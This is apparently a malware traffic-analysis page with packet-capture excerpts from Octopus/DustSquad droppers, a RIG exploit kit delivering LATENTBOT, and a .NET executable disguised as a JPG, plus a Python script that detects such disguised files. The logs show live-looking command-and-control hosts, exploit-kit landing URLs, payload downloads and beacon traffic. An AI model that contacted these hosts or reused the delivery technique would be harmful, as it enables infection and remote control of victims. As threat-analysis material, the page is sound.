
OCTOPUS APT/2 Malware PCAP Download Traffic Analysis 88.198.204.196

2018-11-06 03:08:56.939686 IP 10.1.10.73.65480 > 10.1.10.100.55555: Flags [P.], seq 1:562, ack 1, win 2053, length 561
GET /apt/DustSquad/OctopusDelphi.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:08:56.939868 IP 10.1.10.100.55555 > 10.1.10.73.65480: Flags [.], ack 562, win 237, length 0

2018-11-06 03:09:11.604468 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [S.], seq 949224391, ack 3926170411, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
2018-11-06 03:09:11.604766 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:11.608831 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [P.], seq 1:240, ack 1, win 256, length 239: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: 148.251.185.168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.735371 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [P.], seq 1:325, ack 240, win 1026, length 324: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found

2018-11-06 03:09:11.866394 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [F.], seq 325, ack 241, win 1026, length 0
2018-11-06 03:09:11.866628 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 326, win 255, length 0
2018-11-06 03:09:11.869397 IP 10.1.10.73.65491 > 88.198.204.196.80: Flags [P.], seq 1:239, ack 1, win 256, length 238: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: 88.198.204.196
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.995486 IP 88.198.204.196.80 > 10.1.10.73.65491: Flags [.], ack 239, win 123, length 0
2018-11-06 03:09:13.175672 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [S.], seq 1943939956, ack 4008735111, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:09:13.175994 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:13.193802 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [P.], seq 1:241, ack 1, win 256, length 240: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: www.runa-ldn.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:13.314178 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [.], ack 241, win 123, length 0
2018-11-06 03:09:44.234391 IP 104.118.190.54.80 > 10.1.10.73.65508: Flags [S.], seq 565809931, ack 3247929270, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:09:44.234657 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:54.671156 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:09:54.672196 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

2018-11-06 03:10:22.717526 IP 10.1.10.73.65527 > 10.1.10.100.55555: Flags [P.], seq 1:580, ack 1, win 2053, length 579
GET /apt/DustSquad/OctopusTelegramMessengerDropper.bin HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:10:22.717734 IP 10.1.10.100.55555 > 10.1.10.73.65527: Flags [.], ack 580, win 238, length 0

2018-11-06 03:11:34.409113 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
2018-11-06 03:11:34.409705 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [P.], seq 1:140, ack 1, win 256, length 139
GET /catalogs/cdns?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: */*

2018-11-06 03:11:34.413491 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [S.], seq 1499628406, ack 606991932, win 28960, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2018-11-06 03:11:34.413719 IP 10.1.10.73.49183 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
IP 10.1.10.73.49183 > 37.244.26.41.1119: Flags [P.], seq 1:144, ack 1, win 256, length 143
GET /catalogs/versions?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: */*

2018-11-06 03:11:34.503109 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [P.], seq 123:676, ack 144, win 4380, length 553
Region!STRING:0|BuildConfig!HEX:16|CDNConfig!HEX:16|KeyRing!HEX:16|BuildId!DEC:4|VersionsName!String:0|ProductConfig!HEX:16

## seqn = 57858

2018-11-06 03:12:14.326073 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [S.], seq 1417380829, ack 1364937650, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:12:14.326386 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:12:14.332421 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [P.], seq 1:83, ack 1, win 256, length 82: HTTP: GET /ncc.txt HTTP/1.1
GET /ncc.txt HTTP/1.1
Host: ncc.avast.com
User-Agent: Avast NCC
Accept: */*

2018-11-06 03:12:14.350954 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [.], ack 83, win 229, length 0

2018-11-06 03:12:14.351729 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [P.], seq 1:152, ack 83, win 229, length 151: HTTP: HTTP/1.1 200 OK

2018-11-06 03:13:14.499210 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 4535:4877, ack 302, win 3, length 342: HTTP
(binary payload, 342 bytes, trailer "ASWSig2B")

2018-11-06 03:13:14.516560 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 302:604, ack 4877, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:13:14.589588 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 604, win 4, length 0

2018-11-06 03:17:59.378603 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 9411:9771, ack 604, win 4, length 360: HTTP
(binary payload, 360 bytes, trailer "ASWSig2B")

2018-11-06 03:17:59.396393 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 604:906, ack 9771, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:17:59.471625 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 906, win 4, length 0

2018-11-06 03:20:48.497232 IP 104.110.209.95.80 > 10.1.10.73.49426: Flags [S.], seq 1611496151, ack 3370241501, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:20:48.497541 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:20:48.498451 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:20:48.498498 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0

2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
CONTENT-LENGTH: 0

2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK

2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

(binary body, 30 bytes)
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

(binary body, 47 bytes)
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
HTTP/1.1 200 OK
CONTENT-LENGTH: 16

(binary body, 16 bytes)

POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

W32/Felix Iran APT/Malware Fake JPG senario104.jpg Binary PCAP file download Traffic Sample

Unknown IRAN fake image binary file

file senario104.jpg
senario104.jpg: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
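The `file` verdict above is the whole point of this sample: the download is named as a JPEG but starts with an MZ/PE header, and `file` goes on to read the PE32 magic, the GUI subsystem, the i386 machine type and the CLR data directory that marks a .NET assembly. The Python below is an added example, not code from this page, that performs the same magic-byte check and pulls out those fields, then reports an extension mismatch when an image-named file is really a PE. The `build_fake_pe` helper constructs a minimal synthetic header for the test; it is not the senario104.jpg sample, and its values (e_lfanew, section count, data-directory RVAs) are made up.

```python
import struct

JPEG_MAGIC = b'\xff\xd8\xff'
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x14C: 'Intel 80386', 0x8664: 'x86-64', 0x1C0: 'ARM', 0xAA64: 'ARM64'}
SUBSYSTEMS = {2: 'GUI', 3: 'console'}
IMAGE_EXTS = {'jpg', 'jpeg', 'gif', 'png', 'bmp'}

def inspect_header(data: bytes) -> dict:
    """Classify a blob by its magic bytes; for PE files, pull out the fields
    that `file` reports (machine, subsystem, DLL flag, CLR header presence)."""
    if data.startswith(JPEG_MAGIC):
        return {'kind': 'jpeg'}
    if len(data) < 0x40 or data[:2] != b'MZ':
        return {'kind': 'unknown'}
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        return {'kind': 'mz-no-pe'}
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    if len(data) < opt + 112:
        return {'kind': 'pe-truncated'}
    machine, _nsect, _ts, _symp, _nsym, _opt_size, chars = struct.unpack_from(
        '<HHIIIHH', data, e_lfanew + 4)
    pe32plus = struct.unpack_from('<H', data, opt)[0] == 0x20B
    subsystem = struct.unpack_from('<H', data, opt + 68)[0]   # same offset in PE32 and PE32+
    ndirs_off = opt + (108 if pe32plus else 92)               # NumberOfRvaAndSizes
    ndirs = struct.unpack_from('<I', data, ndirs_off)[0]
    clr = False
    if ndirs > 14 and len(data) >= ndirs_off + 4 + 15 * 8:    # directory 14 = CLR runtime header
        rva, size = struct.unpack_from('<II', data, ndirs_off + 4 + 14 * 8)
        clr = rva != 0 and size != 0
    return {'kind': 'pe', 'pe32plus': pe32plus, 'machine': machine,
            'subsystem': subsystem, 'dll': bool(chars & IMAGE_FILE_DLL), 'clr': clr}

def describe(info: dict) -> str:
    """Render roughly what `file` prints for the same header."""
    if info.get('kind') != 'pe':
        return info.get('kind', 'unknown')
    parts = ['PE32+' if info['pe32plus'] else 'PE32',
             '(DLL)' if info['dll'] else 'executable',
             '(%s)' % SUBSYSTEMS.get(info['subsystem'], 'subsystem %d' % info['subsystem']),
             MACHINES.get(info['machine'], 'machine 0x%x' % info['machine'])]
    if info['clr']:
        parts.append('Mono/.Net assembly')
    return ' '.join(parts)

def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims an image but the bytes are a PE."""
    ext = filename.rsplit('.', 1)[-1].lower() if '.' in filename else ''
    return ext in IMAGE_EXTS and inspect_header(data)['kind'] == 'pe'

def build_fake_pe(clr: bool = True, subsystem: int = 2) -> bytes:
    """Constructed test input: a minimal PE32 header with no sections, shaped like
    the header `file` described for senario104.jpg. Not the real sample."""
    e_lfanew = 0x80
    hdr = bytearray(e_lfanew + 4 + 20 + 224)
    hdr[0:2] = b'MZ'
    struct.pack_into('<I', hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b'PE\0\0'
    # COFF: i386, 0 sections, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into('<HHIIIHH', hdr, e_lfanew + 4, 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = e_lfanew + 24
    struct.pack_into('<H', hdr, opt, 0x10B)           # PE32 magic
    struct.pack_into('<H', hdr, opt + 68, subsystem)
    struct.pack_into('<I', hdr, opt + 92, 16)         # NumberOfRvaAndSizes
    if clr:
        struct.pack_into('<II', hdr, opt + 96 + 14 * 8, 0x2008, 0x48)  # made-up CLR header RVA/size
    return bytes(hdr)

if __name__ == '__main__':
    import sys
    for name in sys.argv[1:]:
        with open(name, 'rb') as f:
            head = f.read(4096)
        print(name, describe(inspect_header(head)), 'MISMATCH' if extension_mismatch(name, head) else '')
```

Only the first few KiB need to be read, so this is cheap to run over a download directory or a proxy cache. It deliberately trusts the PE signature rather than the extension or the Content-Type the server sent, since both were under the attacker's control here.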

 

2016-10-23 01:32:16.438427 IP 192.168.1.102.58937 > 79.127.127.67.80: Flags [P.], seq 0:297, ack 1, win 64240, length 297: HTTP: GET /senario104.jpg HTTP/1.1
GET /senario104.jpg HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: limlim00000.rozup.ir
Connection: Keep-Alive


2016-10-23 01:32:55.262559 IP 192.168.1.102.58940 > 79.127.127.67.80: Flags [P.], seq 0:203, ack 1, win 256, length 203: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: limlim00000.rozup.ir
Connection: Keep-Alive